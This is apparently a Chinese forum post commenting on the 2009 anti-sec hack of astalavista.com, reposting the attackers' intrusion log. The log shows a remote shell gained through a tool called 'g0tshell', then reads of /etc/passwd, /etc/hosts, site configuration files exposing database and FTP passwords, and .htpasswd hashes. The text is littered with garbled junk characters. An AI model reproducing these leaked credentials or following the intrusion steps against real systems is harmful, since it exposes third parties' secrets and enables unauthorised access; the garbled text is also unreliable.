里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。% j/ t3 j" A5 Q8 ^* m9 |: u. ]5 a$ |7 w
& o q3 U9 m! ?) G* a" L1 J( i[root@front3 ~]# curl -I litespeedtech.com
; k4 h0 H. w1 {" l! kHTTP/1.1 200 OK$ Y2 @, \. E* M) P% n
Date: Fri, 05 Jun 2009 22:54:51 GMT
: z1 \7 `9 l4 oServer: LiteSpeed& u& m+ g& k; P3 [- W. H& }6 T
9 A# y* y, }9 R4 l8 P" \5 x. p1 f另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-7 o: S/ J1 A* d5 @8 L. ]
% w8 F/ C1 g5 p: `9 |
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
& i- W( ]1 T) B x% I- U. h7 S' m; v% w+ b1 K3 {
7 \; t: P0 m" j5 Q" V, Y/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ ' Y0 P0 \4 E e0 \; v9 J' l
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \) t5 Y0 k2 b: p( o% R; g
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \- c7 u- I8 c3 Q
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
* {, U+ z v* T) D: B2 I \/ \/ \/ \/ \/ \/ \/
0 ^8 Z" ~: k( q& i6 f$ j# ] The Hacking & Security Community
& l. g" U) R3 V0 ]0 D: Y[+] Founded in 1997 by a hacker computer enthusiast
8 {) U- |! }; T[-] Exposed in 2009 by anti-sec group
& t7 m6 ^% U, B/ t! u; L$ _* c4 j `3 K7 U2 b! f# a/ A& b' a
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
8 d+ p) Z* D6 P>> 03. Who’s behind the site?; n8 ^0 r8 s" O0 S' b+ P3 I
>>
: Z8 A! x9 I" i>> A team of security and IT professionals, and a countless number of contributors from all over the world.2 ?& b8 v9 T8 G+ o( V' f9 t, r
" ~: \8 O' w+ Q
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?/ ], U) ^; a/ X4 {- T% m) q2 t, D& X( G
>>' P3 D( y: h& a' W, H. q7 c7 V
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and5 @% O; B/ @9 x# v1 p: D: [
military institutions.
, K- ]0 t7 u4 n% x9 Q2 l2 Z4 C/ w% h>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information. K- y$ l4 t& y7 H% k I: F2 r$ K
( l2 C+ f$ O& \6 V/ h; M5 e- `
Why has Astalavista been targeted?* s3 D4 }, c1 r$ c# r8 }% `7 L
6 {% Q$ I! j z
Other than the fact that they are not doing any of this for the “community” but5 d! E9 r) W" P p
for the money, they spread exploits for kids, claim to be a security community+ d3 \& y) c# l
(with no real sense of security on their own servers), and they charge you $6.66
, K b' [% |, V# [per months to access a dead forum with a directory filled with public releases
, d" S ?# i2 E ]4 g( [8 [and outdated / broken services.$ G0 r+ X! T# `# ]1 S% J4 V/ f& n) r7 m1 Q
4 `! C' c/ o& |2 Z; }
We wanted to see how good that “team of security and IT professionals” really is.
! m$ ~$ L/ l/ M( k1 W- A! C1 R
5 K6 f, t& d* U% P% ?Let’s begin., x* T0 X( V* \3 K# p* {
5 j& M( h* G$ ]% [& j. Santi-sec:~# ./g0tshell astalavista.com -p 806 T9 x$ a$ m4 }/ L3 w3 F* _4 K
[+] Connecting to astalavista.com:80! E' r9 w2 i" S. b( r
[+] Grabbing banner…
1 e/ S' k$ a+ n7 e8 g/ X; LLiteSpeed
% o" Y5 x% E b3 t9 o3 s[+] Injecting shellcode…
5 l: }- I+ b0 h+ j. V2 x[-] Wait for it9 J( ]$ t1 r1 Q/ i+ e% a4 ^* ~
5 M3 A( l5 D( E' K8 ~
[~] We g0tshell/ I7 f: ^8 D- B- |, m" j) f
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
6 F# [# X+ F7 Y3 u) C" eID: uid=100(apache) gid=500(apache) groups=500(apache)% M0 f7 B+ d6 L
5 C/ }2 @; y4 V1 q' _6 k1 d( d
sh-3.2$ cat /etc/passwd
7 M, v0 \/ M5 \2 qroot:x:0:0:root:/root:/bin/bash* W0 c' k, A3 N( i: P
bin:x:1:1:bin:/bin:/sbin/nologin
* o0 d' N0 C/ M, |daemon:x:2:2:daemon:/sbin:/sbin/nologin4 P8 Y; P! n' W/ b0 M4 L
adm:x:3:4:adm:/var/adm:/sbin/nologin
8 a% ~& y. G3 o7 ]/ hlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
; \" G3 }; l9 v, T6 L+ Psync:x:5:0:sync:/sbin:/bin/sync+ c7 M8 X; s# A% i9 |
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown2 u h% w; b" \4 Q6 _8 y
halt:x:7:0:halt:/sbin:/sbin/halt
( i9 {3 ?3 K4 Fmail:x:8:12:mail:/var/spool/mail:/sbin/nologin
7 B6 l6 L% p( K) ^news:x:9:13:news:/etc/news:6 @/ @; B8 j8 j$ p8 Q, c2 Y
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin) Q2 l: ]; |' ^% W4 n5 q7 ], ?8 n
operator:x:11:0 perator:/root:/sbin/nologin- P1 s/ j5 x1 u/ {) B
games:x:12:100:games:/usr/games:/sbin/nologin
7 x+ f: f) m' M! z6 r' fgopher:x:13:30:gopher:/var/gopher:/sbin/nologin" T- }* ^! D+ V$ ^( J D* P7 z
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
$ u, J8 x5 i2 v0 fnobody:x:99:99:Nobody:/:/sbin/nologin' r& {4 s- R: X) F$ _& O
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
) I! S- i3 ~+ r* k* M9 ddbus:x:81:81:System message bus:/:/sbin/nologin/ O0 ]8 E" u* h, T4 g8 K9 c
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin+ n$ h- A, d# [. f' m" K: S1 j$ l
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
% J4 }& W5 h8 Nsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
4 G9 \9 |! e0 ]5 D: B. O$ Evcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin: H+ [3 U/ ?; P. |+ N+ C8 C
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin9 ~; T, Y* D: ]9 {' y, H* C
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin1 c6 H' ~& r2 S6 f& t0 M) g
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
! S* \# m0 L+ N" Q4 r% Infsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin: d0 m7 y; ?$ Z$ q) c
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
3 e4 C' m, H6 G$ \4 X' `) q/ Bpcap:x:77:77::/var/arpwatch:/sbin/nologin- z' h9 @$ u- `" n. S
named:x:25:25:Named:/var/named:/sbin/nologin) C2 {1 @# t" w2 I; X) F
apache:x:100:500::/var/www:/bin/false( y$ ?: i1 {' |; l- P5 Y3 ^
diradmin:x:101:101::/usr/local/directadmin:/bin/bash0 R. i% }8 b5 D" S. \, g6 @
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
# V/ i7 Z H. |1 j* w! hwebapps:x:500:501::/var/www/html:/bin/bash
9 z. p! G6 N4 F% q4 \majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
3 Y# J' q! W2 e. t9 q$ g. p" J, w+ Qadmin:x:501:502::/home/admin:/bin/bash
, ^* T+ \0 U9 Rjon:x:502:503::/home/jon:/bin/bash
7 g/ u9 O* w4 g0 Ycom:x:503:504::/home/com:/bin/bash
" v) B& E) h! nntp:x:38:38::/etc/ntp:/sbin/nologin
) L/ j; ^ ~: P7 K' X6 R1 d- Rais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin7 \* l9 {, ~% r
astanet:x:504:505::/home/astanet:/bin/bash% @: }0 n# Q# e% D% ^5 e0 F
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
+ P! a! j F3 |& O0 _6 {avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
$ Y. B6 h# A- o1 \5 ~5 N2 ]: ^5 E2 T. R% w3 {7 U$ R
sh-3.2$ cat /etc/hosts" K) \0 ?9 x) n8 q1 C9 M
# Do not remove the following line, or various programs
6 Y) {0 A i' p7 V& a# that require network functionality will fail.% E5 ~, ]/ ?/ O1 Y4 `1 d
127.0.0.1 localhost.localdomain localhost, K7 N% x& i2 }9 [; O
::1 localhost6.localdomain6 localhost69 s) r1 o; p3 `: s: b4 l
80.74.154.172 asta1.astalavistaserver.com
! R2 X. H4 [4 n9 b5 G0 p7 p; ?+ ~+ \7 Z$ W
sh-3.2$ pwd
! m% w5 [! J3 x# r, Z' Z/home/com/public_html
0 b: D. v/ E0 L" @ d+ j/ }/ Y# N6 ~9 Z% S8 D% B* i$ u
sh-3.2$ ls -la0 d! P# Z8 e* S. [ T1 }; ~
total 18460& a: _9 {8 D1 U! L, k+ J
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
$ B1 q! d! h+ ldrwx–x–x 11 com com 4096 Jun 25 2008 ..
7 Z" U0 n& s5 O3 J/ }6 ^+ Q% Zdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin! t% |4 z9 \! _2 e1 r9 f
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache: }( Z% u1 n/ E3 q9 i& r. ~
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin3 p5 z/ b4 C* @3 R5 [0 e
drwxrwxrwx 2 com com 4096 May 19 00:50 config7 r1 C; d! V7 J( N% {# V2 w4 B6 q4 z
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core. }% D+ N) h! [
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules Y3 G, Y0 c" t( ^. s. h e
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
" X$ B) N2 ~7 E3 udrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo! q: p" N6 H! r( M1 C8 [& V- E6 `
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__0 c$ R' n5 {9 m+ a
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
2 r# `7 E, ^% g( T h0 ?( Ddrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd2 Y H7 y1 ]9 |0 B& s
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
& S8 W! l4 ^4 z: k; I: \-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
4 p W# W2 |% u3 R1 l* H4 Xdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed( h% n0 c0 s. ?! |4 I9 l
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
8 p+ v0 c) o& d-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak" f, s2 p. n. y: L1 w' g" P/ f! E O
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak$ H9 l) X' W8 O2 K$ I" q, _
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool' c. H' o+ R) X- v8 B' V/ ^) F* F' h
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
/ e& C5 f/ V/ L; l' `7 M-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
5 l5 C! O1 g! F6 n* adrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer4 k5 ~# d% H' F& t' c m# `
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang1 {' Q1 ? N' Z* R
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib5 v( y5 n; q. @$ `8 N" O
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media. U1 {# V7 ?, u: @
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications5 w9 y$ m1 {# k# {- m! z
drwxr-xr-x 34 com com 4096 May 28 16:30 modules' N2 N% x$ |, o# F- G8 p( a
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin% m7 |" \* v/ ~3 E
drwxrwxr-x 22 com com 4096 May 28 17:06 _new! p* f1 ]* {$ }4 q
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
! X7 @. U- h, @! G" jdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy% y! u$ n9 c& v6 P1 y
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy: Z: x& v9 y- a% L) k" I N
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
/ p. d0 ?& @! K& |* a-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
8 p, m3 F$ |& Z: l! `2 m, u2 g; Y" r2 p-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
; w8 M# @9 w3 V, H- B2 E0 odrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
( x- Y, ~' c( v) N6 e' h0 fdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp- s, c. M3 m1 N( \5 ]! z
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam* a# G" Y; h) {
" k! x; D, |, S) d5 F+ m
sh-3.2$ head -20 index.php
2 F9 l" K/ T4 a2 ?% f2 j, n' s<?php
6 m; H/ E) N. i% N/ t" w6 Y1 b8 c" q8 v3 r; K0 D
/**# L+ X1 }( G0 X: L. J
* The main page for the CMS
, |9 t3 z! U6 g6 E4 p7 t* @copyright CONTREXX CMS - COMVATION AG
( u7 O* |; A( `6 K, d* @author Comvation Development Team
9 O# g& h7 |! w% }. z5 j+ k# G2 e& y* @version v1.0.9.10.1 stable
0 a$ N0 q @" l# \9 k* @package contrexx4 \ Y0 ]# Q" B& _$ T' m( \
* @subpackage core
0 P+ q: r7 u9 f- V* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage3 _" {, g& K7 e, _9 |; b
* @since v0.0.0.0
( ^/ G, }) l, y. D6 e' V* @todo Capitalize all class names in project& r. T& {7 n, Q- d* c
* @uses /config/configuration.php
0 j6 G9 F# t7 ?% [( }# [, U* @uses /config/settings.php5 [0 a2 y( J. [1 @; @
* @uses /config/version.php+ V! x* o5 h4 E+ ~
* @uses /core/API.php5 D$ z. t& O! T2 b, ~8 y$ u/ q
* @uses /core_modules/cache/index.class.php6 a6 H! ^4 ~3 @. _5 }- X0 O
* @uses /core/error.class.php- ? \) O% r: f& a) k, n: F e
* @uses /core_modules/banner/index.class.php
1 Y6 x$ @* {1 k) D) ?3 z* @uses /core_modules/contact/index.class.php
2 _( O. R# G6 T: S% `, P
5 Q( M, F* B! `; {8 osh-3.2$ cd config/! V7 t1 Q/ P! G% E- ^9 r
sh-3.2$ ls -la( _9 N: O! @& ?5 r+ X9 V
total 32
! t. l, R: W) D6 f; Ddrwxrwxrwx 2 com com 4096 May 19 00:50 .
' S: ~4 g! t( l+ B( [. t( \4 g" Odrwxr-xr-x 30 com apache 4096 May 28 17:06 ..2 K7 p9 }5 f) C
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php) h) l5 p' v9 a$ `9 K
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
- o7 [) l3 P; _) c-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php6 D8 B. H8 X1 I
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php; a+ z3 a, q* O: r9 \* s
/ l- |4 k/ E+ F/ @7 o6 {
sh-3.2$ cat configuration.php+ S7 Y$ r9 ?! k' {; x" | o6 B- B. Z. O
[snip]
5 p& E* w+ w6 ?6 m3 |3 u$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
& q. t# @8 n. T( g% L$ H2 N( Y6 X$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
4 y' _" R' a' O$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
* y' k6 S" G* @: y- n0 s, A$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username& B: I/ ~- k$ ~4 q! S7 _
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password2 _) `; [$ ]4 w/ B. F* i# F! m1 @* h& m
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
2 Y& H5 x! J# W( @1 {$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
! o, r3 j' y( h; m# q[snip]
3 k z: R% Q( Y/ F p8 q( d* G$_FTPCONFIG['is_activated'] = true; // Ftp support true or false! b( b* D4 C4 j+ T- d
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode/ {( A! V# ^. p D8 g! u* M
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost% y( h L9 a o5 V; W7 y% H
$_FTPCONFIG['port'] = 21; // Ftp remote port
! a6 Y/ x- @ p9 [4 M. I# ^$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username; L) `8 v, u$ g3 } j d+ s
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password4 Z$ F: _9 U1 d
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms7 L3 h, m! R, a; P. E8 [
! }. w- t" j9 f% k; ~1 _ Y
sh-3.2$ cd ../ X8 H4 K/ D4 ?( ` N
sh-3.2$ cd dvd/
e/ B+ b9 n1 {9 C, [sh-3.2$ ls -la
4 _7 S; h2 J( f! G4 I& m7 ptotal 2913780
# m: X) c$ o2 Kdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
2 U0 t: @' G5 ]1 F1 ddrwxr-xr-x 30 com apache 4096 May 28 17:06 ..) ]5 E( `0 a, y* r# n7 e
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
# g% g3 F- S' L-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
& G v5 @2 u. Q/ H-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
K3 t1 `+ q$ T-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess$ K$ Z V! p& e: f/ @& w- D4 X
- [- H" `' I3 N3 S# V6 P
sh-3.2$ cat .htaccess
: x- p& [' w6 s# n# |authType Basic/ O8 v( Z) H4 q
authName DVD
+ J' T" I2 k7 L0 UauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd' L: b8 j2 j: F: G2 G; R
require valid-user9 c6 y3 J& b4 I% u& u" m0 v( T) H3 k+ H
8 U' H; q& l6 L: M7 I; a
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
: `9 N: C) [. zDVDdownload:CRD8cuY6.MPT68 T* P9 ?! j% Z: D$ T
DVDdownload2:CR8a36.wluFMg
) }! v9 {# |! z: H, g9 C7 V: z& w% G r& n* b0 L9 l
sh-3.2$ cat test.php; W8 G1 f, p) q" \1 l) v# }7 M9 \
<?php" l& ~* H4 H7 E/ N
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;9 R6 E1 Z4 G X4 w6 P
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
+ j1 b8 B* d7 i2 X, Lecho $url;
; z8 `% F% J$ j( Z9 d/ s' N?>" \: @9 f$ C4 `7 e
8 D& L7 ]: a7 Q* K1 }
sh-3.2$ cd modifications/8 z4 ]% |; F/ y' |
sh-3.2$ ls -la* C. ]8 E, s) |5 S1 w
total 32. c6 i$ W8 z0 M8 C8 R* m( p" s
drwxr-xr-x 8 com com 4096 May 11 12:48 .
& ~; j5 r0 S/ v9 t% m# [( `6 n5 wdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..& Y0 ]2 K, d5 r/ f
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng! m/ ]$ P) Q( v* k0 O! s3 M
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
8 x/ v0 k9 r7 j% ?drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools# V, [: C3 T2 ^& A) g
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
3 I5 s8 E" l* N" Qdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search
X" N3 l4 [. F3 P7 Z- b% x' o# Cdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
; x) s( ]; P# S$ K, i9 A. z* V$ o, m8 A/ E
sh-3.2$ ls -R. `9 l4 Q0 g' S% ^& W% X+ n
.:
9 t! r- C' X" e" c% ~5 i2 Ucom_avtng cronjobs onlinetools pjirc search _tmp6 b0 W3 x5 ?/ l* L- T
" w7 b/ w/ Q F+ d4 v# Z( ]3 i./com_avtng:& V# v! H! e4 I! ^
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
`* w* r" I: z, b! z2 K) T% a! }. d: v
./com_avtng/scripts:8 j2 g1 c5 p3 \# v* ]4 N
popunder.js- M: Y! C2 s( p" e2 ~% O* b2 M* O
) D' D3 t4 e: @) y; e' c4 ^- i6 Y./cronjobs:
/ g" k* ?. d- a/ L, M/ f0 {exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
% r( ~" M# a9 b4 L/ J, h' H- c# O2 k! f
./cronjobs/tmp:
" I1 E; H7 ^* {1 f; U4 T7 ccontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv4 V& L. W6 O& e, L' [" o: Z
Z) Z# a9 k( ^2 V" G5 n7 f./onlinetools:
/ _4 x0 I$ N& w: f, Y+ a: F$ V' ]index.php
* }) w$ \/ D+ U: {' b G; h& c P1 L0 e# C$ m/ i
./pjirc:( E. I; D3 |% T) Y5 b8 [1 m
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt) t; L5 j ^* G
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
3 F. ]; a8 T1 F. f9 d9 ~3 j7 Mbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd3 ]9 _% M. w Z: `
. I' d4 p9 b1 r( q./pjirc/img:8 J! I6 f% h& {
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif6 t. w) d5 M% F
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
5 |7 `/ F3 N: ^* A2 q0 ]$ K' G4 f$ Yverre-eau.gif3 _. M: Y! g* a. o' h, r, o1 `; D* ~
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif / s0 ?/ E' z, Z
verre-vin.gif
8 \6 r7 n- y4 R- p9 Z W' m3 p4 Qballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
: t' D! ~' A; W% z- [. d9 pbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif7 c C& W5 Y: s2 }0 \
; }- H, c4 Z" q$ z) P2 x; O./pjirc/snd:
D+ ?6 h! x. q6 abell2.au ding.au, f+ x; O, G% A) k& `- |+ l1 @
& [6 D$ d/ C& z; G3 |" u
./search:
2 p# s: z& l1 Y" a n5 hsearchEngines.php search.php
9 Z: W5 J7 k! \5 x+ _- J2 w
$ P H0 Y3 n3 c! `: p8 L' N./_tmp:- L' \6 K, n( H2 e" w
defaultPorts.php defaultPorts.txt
5 o4 y' Z9 ]. s$ o
9 G8 J/ K4 A2 ~, Q) j) v. Rsh-3.2$ cd cronjobs/1 p7 V# r0 e8 Y
sh-3.2$ cat exploits.php( _! i$ ?: O9 `# j/ X( l
[snip]
* ^5 J7 j! u4 X9 n# @$categories = array();
/ l) ?6 \2 ?. T9 @$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;; F* ]& ]5 k' Y8 j6 d1 D* n- z
$expolits = file($milw0rmFile);$ d+ Q( u# P2 x6 R# C
$comExploits = array();
S; Z( J% W, ~! `+ {[snip]9 {/ P, m, |2 [7 ^# V! E
// manage data
- l/ J+ E3 u; F9 Kfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
, g- v; P- \8 G4 k* U7 N2 a$ O
3 `4 t8 p! v; `5 M // get path and title5 A* H3 x6 R2 n+ T+ a
$expolits[$x] = trim($expolits[$x]);, E, g5 ~! Z# @, N) G1 o6 {/ G
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
4 C; O% x7 g" y3 \& @) q $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);& H% u( }" M/ J
P( B0 R2 B8 g/ y: q; P: [! A- M
// check if file exists' p% V9 S, V- k8 y' s' @) e. Q; U
if (file_exists($path)) {
; L3 A# _( e; d3 U6 X9 d
% M8 p" c U. v, ? $text = file_get_contents($path);7 O, k6 L7 u# t% W8 M: H
. e3 O+ @$ o3 ?- s
// get content and date
3 x; D! B% O7 y( x3 m //$text = htmlspecialchars($text, ENT_QUOTES);
7 d, d' |; _& s& G" m6 {7 X $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));& V8 b Q; q- L5 L, [
if ($tmptext != ”) {
0 L: b. F8 L1 g7 e$ i6 Q $text = $tmptext;5 p7 Q+ y0 T( t3 i. Z
} else {
$ Z% h5 T7 L4 o, n) k6 U, ] $text = addslashes(htmlentities($text, ENT_QUOTES));9 `+ S/ B9 T1 @) s2 b( V8 P
}: m, {# h$ I) x$ V) F
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));/ N# k' ^) H2 P$ C
$tmp = explode('-', $date);8 Z7 B7 ]+ t6 @9 [0 e8 w* F( r
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
V5 {# j. } G4 X( }# ? $cat = getCategory ($path);# B& ?$ F8 ]3 [* Z6 Z8 p: d. S% T: B
$ext = pathinfo(basename($path));
+ g6 A0 F% V. R$ V5 H) Y $ext = $ext['extension'];2 F' Y: \7 c# s% ^7 ?- n
$qStr = ”
: t: a: N1 y4 y$ r4 \ SELECT `id`- q, j3 @) }6 o6 ~% y: U" F+ p, D
FROM `contrexx_module_exploits`2 }+ P: Y- P! |. x1 `
WHERE `title` = ‘” . $title . “‘/ u2 s" J7 m) V4 c$ P8 r$ S
AND `date` = ‘” . $date . “‘
$ f+ k% E+ n# V% F3 ^; m “;
4 W7 X1 O: s6 L. V1 m P M echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
$ g3 m7 p. T4 G0 z' o $q = $_objDB->query($qStr);- X2 ]! I6 q- z* `1 e) X
9 @5 o: }5 f1 G$ e$ U3 H
if ($q->numRows() == 0) {
) B5 E4 F/ x4 C0 f; t6 u! X8 J
% J C/ l7 E5 f& E // prepare array9 S8 O. e8 y( y J4 g6 k
$comExploits[$x]['date'] = $date;' F( b* Q, \" G3 f4 X# N! p* \
$comExploits[$x]['title'] = $title;/ l. j7 r, i. F
$comExploits[$x]['author'] = ‘milw0rm’;8 q8 D/ ^$ [9 I7 I
$comExploits[$x]['text'] = $text;
6 X: B6 ?$ q' p2 u2 ]+ L1 V: u $comExploits[$x]['source'] = $ext;
6 y; e9 U' z; ^8 I b8 R" w3 h; m $comExploits[$x]['url1'] = ”;' ]4 K. L7 H1 T$ v
$comExploits[$x]['url2'] = ”;
) Z9 M, B' B' R7 ]; q! v& k, c $comExploits[$x]['catid'] = $cat;
; V" Y9 ?1 B8 |6 l' p $comExploits[$x]['lang'] = ‘2′;
" P) H2 {- k- I- K $comExploits[$x]['userid'] = ‘12′;
1 i( Y4 v# R6 B* W, ]# w $comExploits[$x]['startdate'] = ‘0000-00-00′;7 U; m- B2 I3 J" S" Q B( G
$comExploits[$x]['enddate'] = ‘0000-00-00′;
- p4 h. t5 }7 c* @0 v# i9 e $comExploits[$x]['status'] = ‘1′;
; r. b+ q6 v. z$ M8 [" n+ Y$ w $comExploits[$x]['changelog'] = $date;6 E ]( o! j! }+ C7 s; E: s
* d# O: T/ }6 B7 c
}
- _) a- U, ]; b1 R) ?- z[snip]
